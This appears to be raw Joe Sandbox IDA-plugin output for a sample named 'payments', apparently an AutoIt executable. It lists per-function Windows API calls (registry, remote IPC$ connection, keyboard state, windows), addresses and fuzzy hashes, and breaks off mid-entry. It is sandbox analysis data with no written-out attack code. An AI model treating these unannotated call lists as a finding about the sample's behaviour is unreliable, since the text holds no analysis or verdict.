                                                                                                                          • API String ID: 1194449130-2582809321
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CD55D7
                                                                                                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00CD5664
                                                                                                                          • GetMenuItemCount.USER32(00D51708), ref: 00CD56ED
                                                                                                                          • DeleteMenu.USER32(00D51708,00000005,00000000,000000F5,?,?), ref: 00CD577D
                                                                                                                          • DeleteMenu.USER32(00D51708,00000004,00000000), ref: 00CD5785
                                                                                                                          • DeleteMenu.USER32(00D51708,00000006,00000000), ref: 00CD578D
                                                                                                                          • DeleteMenu.USER32(00D51708,00000003,00000000), ref: 00CD5795
                                                                                                                          • GetMenuItemCount.USER32(00D51708), ref: 00CD579D
                                                                                                                          • SetMenuItemInfoW.USER32(00D51708,00000004,00000000,00000030), ref: 00CD57D3
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CD57DD
                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 00CD57E6
                                                                                                                          • TrackPopupMenuEx.USER32(00D51708,00000000,?,00000000,00000000,00000000), ref: 00CD57F9
                                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00CD5805
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3993528054-0
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CCA1DC
                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00CCA211
                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00CCA22D
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00CCA249
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00CCA273
                                                                                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00CCA29B
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CCA2A6
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CCA2AB
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                          • API String ID: 1687751970-22481851
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2BB5,?,?), ref: 00CF3C1D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: 218655c861fff2cba2cfd9ff56d1eb0a503216bab35400e7320ed1f291ed031d
• Instruction ID: ed167d6bd1a37e88812e8bf77d4065feba46844876ab67c4fd582bcf47b2b933
• Opcode Fuzzy Hash: 218655c861fff2cba2cfd9ff56d1eb0a503216bab35400e7320ed1f291ed031d
• Instruction Fuzzy Hash: FB417E3012028EABCF40EF10D851AFB3365BF22318F104814ED655B292EB70EE4ADF61
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CFA259
• CreateCompatibleDC.GDI32(00000000), ref: 00CFA260
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CFA273
• SelectObject.GDI32(00000000,00000000), ref: 00CFA27B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00CFA286
• DeleteDC.GDI32(00000000), ref: 00CFA28F
• GetWindowLongW.USER32(?,000000EC), ref: 00CFA299
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00CFA2AD
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00CFA2B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: @U=u$static
• API String ID: 2559357485-3553413495
• Opcode ID: 1a3a89d92931cf5bbda05946d53f319c131bbcddb3f0f16c4bdb9f4680f8fb05
• Instruction ID: 15c97b15e97bea8a062e2cc0e04915b257df5ffdeddadcc28759a3261d60b10b
• Opcode Fuzzy Hash: 1a3a89d92931cf5bbda05946d53f319c131bbcddb3f0f16c4bdb9f4680f8fb05
• Instruction Fuzzy Hash: B5319E71200219BFDF119FA4DC49FEA3B69FF09360F114214FA29E61A0CB35D812DBA5
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D036F4,00000010,?,Bad directive syntax error,00D2DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00CD25D6
• LoadStringW.USER32(00000000,?,00D036F4,00000010), ref: 00CD25DD
• _wprintf.LIBCMT ref: 00CD2610
• __swprintf.LIBCMT ref: 00CD2632
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CD26A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1080873982-4153970271
• Opcode ID: 7241f304e07d7fba7eae0f248240aa352f95189ac7cb56ee723cc6eec51a3eff
• Instruction ID: d3654ad3d581e58bc21830ec2b0698ab518c1273d985c43db445e58acdcfaa26
• Opcode Fuzzy Hash: 7241f304e07d7fba7eae0f248240aa352f95189ac7cb56ee723cc6eec51a3eff
• Instruction Fuzzy Hash: 6E21413184031ABFCF12EF90CC5AEEE7779BF19304F044455F615661A2EB71A619EB60
APIs
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CD7B42
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CD7B58
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CD7B69
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CD7B7B
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CD7B8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: SendString
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 890592661-1007645807
• Opcode ID: 1c24af466380e66bb529e90cb0d3fc493ee4fbb29535b439a753003de6df8a9c
• Instruction ID: cee467cc803909fbfa812f1dc87d0898e32de339c4bc9287f4635d58fb1353be
• Opcode Fuzzy Hash: 1c24af466380e66bb529e90cb0d3fc493ee4fbb29535b439a753003de6df8a9c
• Instruction Fuzzy Hash: C51194A16502597EDB20B7A5CC8ADFFBA7CEB91B10F00051A7551A21D1EE701A49C6B0
APIs
  • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
  • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
• CoInitialize.OLE32(00000000), ref: 00CE034B
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CE03DE
• SHGetDesktopFolder.SHELL32(?), ref: 00CE03F2
• CoCreateInstance.OLE32(00D1DA8C,00000000,00000001,00D43CF8,?), ref: 00CE043E
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CE04AD
• CoTaskMemFree.OLE32(?,?), ref: 00CE0505
• _memset.LIBCMT ref: 00CE0542
• SHBrowseForFolderW.SHELL32(?), ref: 00CE057E
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CE05A1
• CoTaskMemFree.OLE32(00000000), ref: 00CE05A8
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00CE05DF
• CoUninitialize.OLE32(00000001,00000000), ref: 00CE05E1
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: dbf9d36dd36c4cd1d83020f6c915176bcb44fb99d27135c1546da31aced681ef
• Instruction ID: 1de8341cc515f72150b0e7e0de7220f5a45d985f4892fd69150e097b33aca968
• Opcode Fuzzy Hash: dbf9d36dd36c4cd1d83020f6c915176bcb44fb99d27135c1546da31aced681ef
• Instruction Fuzzy Hash: 53B1EB75A00209AFDB04DFA5C889DAEBBB9FF48314B148459F905EB251DB70EE81CF50
APIs
• GetKeyboardState.USER32(?), ref: 00CD2ED6
• SetKeyboardState.USER32(?), ref: 00CD2F41
• GetAsyncKeyState.USER32(000000A0), ref: 00CD2F61
• GetKeyState.USER32(000000A0), ref: 00CD2F78
• GetAsyncKeyState.USER32(000000A1), ref: 00CD2FA7
• GetKeyState.USER32(000000A1), ref: 00CD2FB8
• GetAsyncKeyState.USER32(00000011), ref: 00CD2FE4
• GetKeyState.USER32(00000011), ref: 00CD2FF2
• GetAsyncKeyState.USER32(00000012), ref: 00CD301B
• GetKeyState.USER32(00000012), ref: 00CD3029
• GetAsyncKeyState.USER32(0000005B), ref: 00CD3052
• GetKeyState.USER32(0000005B), ref: 00CD3060
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: d1e8820c3b29bb2f3e0cf00891a1d612d9c55c9a811436367708f1ece05099d5
• Instruction ID: 84fa187cf28deb2c5989552660e7ed386cfac4d56971117608853085e4e658da
• Opcode Fuzzy Hash: d1e8820c3b29bb2f3e0cf00891a1d612d9c55c9a811436367708f1ece05099d5
• Instruction Fuzzy Hash: 2951D620A047D429FB35EBA488507EABBB45F21340F08859FD7D2567C2DB64AB8CD762
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00CCED1E
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00CCED30
                                                                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00CCED8E
                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00CCED99
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00CCEDAB
                                                                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00CCEE01
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00CCEE0F
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00CCEE20
                                                                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00CCEE63
                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00CCEE71
                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CCEE8E
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCEE9B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3096461208-0
                                                                                                                          • Opcode ID: 1604ec7c1cdc0f46355c480f2dbd33ad6c08d9f09e9148b5b1b59bfd9ac832f0
                                                                                                                          • Instruction ID: 5ec48e07a58e52f08223e9273a8e370c948d14303452c4fedb85b0265ef57fbb
                                                                                                                          • Opcode Fuzzy Hash: 1604ec7c1cdc0f46355c480f2dbd33ad6c08d9f09e9148b5b1b59bfd9ac832f0
                                                                                                                          • Instruction Fuzzy Hash: 8651F171B00209AFDB14CF69DD85EAEBBB6AB89701F14812DF515D6290DB709E018B10
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CAB759,?,00000000,?,?,?,?,00CAB72B,00000000,?), ref: 00CABA58
                                                                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00CAB72B), ref: 00CAB7F6
                                                                                                                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00CAB72B,00000000,?,?,00CAB2EF,?,?), ref: 00CAB88D
                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00D0D8A6
                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CAB72B,00000000,?,?,00CAB2EF,?,?), ref: 00D0D8D7
                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CAB72B,00000000,?,?,00CAB2EF,?,?), ref: 00D0D8EE
                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CAB72B,00000000,?,?,00CAB2EF,?,?), ref: 00D0D90A
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00D0D91C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 641708696-0
                                                                                                                          • Opcode ID: 64ce219c50cbd9d1e0056f4859627dab251b705c3b6756f9de2abd8d66223862
                                                                                                                          • Instruction ID: a128b79867b6193a9b28003fda4c60271e757800227fad06f5935d63f9140066
                                                                                                                          • Opcode Fuzzy Hash: 64ce219c50cbd9d1e0056f4859627dab251b705c3b6756f9de2abd8d66223862
                                                                                                                          • Instruction Fuzzy Hash: E461BA34500702EFDB258F59E888B65B7F6FF8631AF18441EE446C6AA1CB74AC80DF60
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB526: GetWindowLongW.USER32(?,000000EB), ref: 00CAB537
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00CAB438
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ColorLongWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 259745315-0
                                                                                                                          • Opcode ID: 9e835608c3c57ae1d7846471084a84e4aa78e399e55d6848680137348da9942c
                                                                                                                          • Instruction ID: 6842135fb288f8c11d72378957b1a6b540db1b6b70764f464e8edba1bd445e69
                                                                                                                          • Opcode Fuzzy Hash: 9e835608c3c57ae1d7846471084a84e4aa78e399e55d6848680137348da9942c
                                                                                                                          • Instruction Fuzzy Hash: D4419371040245BFDB205F68D889BF93B66AB4B735F188291FD658A2E7D7308D82D731
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 136442275-0
                                                                                                                          • Opcode ID: 7c9dd8f37e4ac0311ac3b7ffe0636624eca1366a02d1b09ce7fd7691c1d84801
                                                                                                                          • Instruction ID: cfc4b4065097c9b8a5b0044641d06a01f5fc94f620df0a2120a80de55efb8f0f
                                                                                                                          • Opcode Fuzzy Hash: 7c9dd8f37e4ac0311ac3b7ffe0636624eca1366a02d1b09ce7fd7691c1d84801
                                                                                                                          • Instruction Fuzzy Hash: 2E410E7684511CAECF61EB94CC86DDBB3BCEB44300F1041A7B699A2151EB30ABE9DF51
                                                                                                                          APIs
                                                                                                                          • CharLowerBuffW.USER32(00D2DC00,00D2DC00,00D2DC00), ref: 00CDD7CE
                                                                                                                          • GetDriveTypeW.KERNEL32(?,00D43A70,00000061), ref: 00CDD898
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDD8C2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                          • API String ID: 2820617543-1000479233
                                                                                                                          • Opcode ID: 30347dbdcc30fab5ee6e1e94aaba22ec4670c6b2b6202a4cfe5e0947e4fa2c1f
                                                                                                                          • Instruction ID: 2bd277f7d702d7a146a4056e7d7aabfd362a544d7db8a0fa10c27d497b31ab2f
                                                                                                                          • Opcode Fuzzy Hash: 30347dbdcc30fab5ee6e1e94aaba22ec4670c6b2b6202a4cfe5e0947e4fa2c1f
                                                                                                                          • Instruction Fuzzy Hash: 49518331544301AFC701EF14DC92AAEB7A5EF95318F10882EF5AA57392DB31DE05EA92
                                                                                                                          APIs
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CFB3F4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InvalidateRect
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 634782764-2594219639
                                                                                                                          • Opcode ID: fcf18432a0d4f5a9d8d98eb0410ada4c7227617e76643cb68d40a85ac202369f
                                                                                                                          • Instruction ID: 9aa77b57e5608340e209b512d8b041c55f7a1fd61e9357de323dc3b149ce4cfc
                                                                                                                          • Opcode Fuzzy Hash: fcf18432a0d4f5a9d8d98eb0410ada4c7227617e76643cb68d40a85ac202369f
                                                                                                                          • Instruction Fuzzy Hash: 9E51B33164020DBBEF609F29CD85BBD3B65AB05314F244111FB25E66E2CB71EE449B52
                                                                                                                          APIs
                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00D0DB1B
                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D0DB3C
                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D0DB51
                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D0DB6E
                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D0DB95
                                                                                                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00CAA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00D0DBA0
                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D0DBBD
                                                                                                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00CAA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00D0DBC8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 1268354404-2594219639
                                                                                                                          • Opcode ID: 49b3a34af6d2a05996be219ffd80c6294826b65d64496c6781b7cbaaeb95d3d8
                                                                                                                          • Instruction ID: 260eeef5341034c566cbf205579ead6c851f8efb704448a23cb6074c01689914
                                                                                                                          • Opcode Fuzzy Hash: 49b3a34af6d2a05996be219ffd80c6294826b65d64496c6781b7cbaaeb95d3d8
                                                                                                                          • Instruction Fuzzy Hash: AE517A74600309EFDB20DF69CC81FAA77BAAB09754F144619F94AD72D0DBB0AD80DB60
                                                                                                                          APIs
                                                                                                                          • __swprintf.LIBCMT ref: 00C993AB
                                                                                                                          • __itow.LIBCMT ref: 00C993DF
                                                                                                                            • Part of subcall function 00CB1557: _xtow@16.LIBCMT ref: 00CB1578
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
